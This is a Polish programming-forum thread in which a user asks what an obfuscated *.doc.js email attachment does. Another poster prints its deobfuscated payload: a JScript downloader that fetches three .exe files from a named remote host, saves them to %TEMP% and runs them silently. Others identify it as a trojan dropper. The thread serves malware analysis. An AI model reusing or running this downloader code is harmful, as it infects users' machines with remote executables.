![]() |
![]() ![]() |
![]() |
![]()
Post
#1
|
|
![]() Grupa: Zarejestrowani Postów: 49 Pomógł: 1 Dołączył: 23.01.2007 Skąd: Wołomin Ostrzeżenie: (0%) ![]() ![]() |
Witam,
Regularnie na moją służbową skrzynkę pocztową przychodzi wiadomość z załącznikiem *.doc.js. Z ciekawości otworzyłem ją edytorem tekstu i zobaczyłem zawiły kod, którego nie potrafię zrozumieć. Co on ma na celu?
Tutaj to samo na pastebin.com Ten post edytował verio 3.12.2014, 09:33:52 |
|
|
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 467 Pomógł: 77 Dołączył: 6.09.2008 Skąd: Miechów / Kraków Ostrzeżenie: (0%) ![]() ![]() |
Taki jest kod wynikowy wykonywany na końcu:
Kod function dl(fr,fn,rn) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+"\\"+fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState === 4) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn,2); xa.close(); }; }; xo.open("GET",fr,false); xo.send(); if (rn > 0) { try { ws.Run(fn,0,0); } catch (er) { }; }; }; dl("http://mbbdbl.binarycrafter.com/document.php?id=54575C5E171D171001092414160B100117104A070B094A1408&rnd=2311051","85906495.exe",1); dl("http://mbbdbl.binarycrafter.com/document.php?id=54575C5E171D171001092414160B100117104A070B094A1408&rnd=3646332","82598137.exe",1); dl("http://mbbdbl.binarycrafter.com/document.php?id=54575C5E171D171001092414160B100117104A070B094A1408&rnd=1713053","48184342.exe",1); Może ktoś będzie wiedział co dokładnie to robi ![]() -------------------- Niemożliwym jest stworzenie czegokolwiek idiotoodpornego, ponieważ idioci są wyjątkowo pomysłowi.
https://www.aroch.pl https://themeforest.net/user/aroch https://www.astroblog.aroch.pl https://www.4geeks.pl |
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 6 806 Pomógł: 1828 Dołączył: 11.03.2014 Ostrzeżenie: (0%) ![]() ![]() |
Ściąga trojana i go uruchamia.
-------------------- |
|
|
![]()
Post
#4
|
|
![]() Grupa: Zarejestrowani Postów: 49 Pomógł: 1 Dołączył: 23.01.2007 Skąd: Wołomin Ostrzeżenie: (0%) ![]() ![]() |
Wydaje się jakby pobierał binarkę z urla, zapisywał ją pod nazwą z drugiego parametru funkcji dl i jeśli trzeci parametr jest większy od zera - uruchamiał ją.
Dziękuję za pomoc. P.S. Nie planuję dalej sprawdzać co się stanie :-) |
|
|
![]() ![]() |
![]() |
Wersja Lo-Fi | Aktualny czas: 19.07.2025 - 07:34 |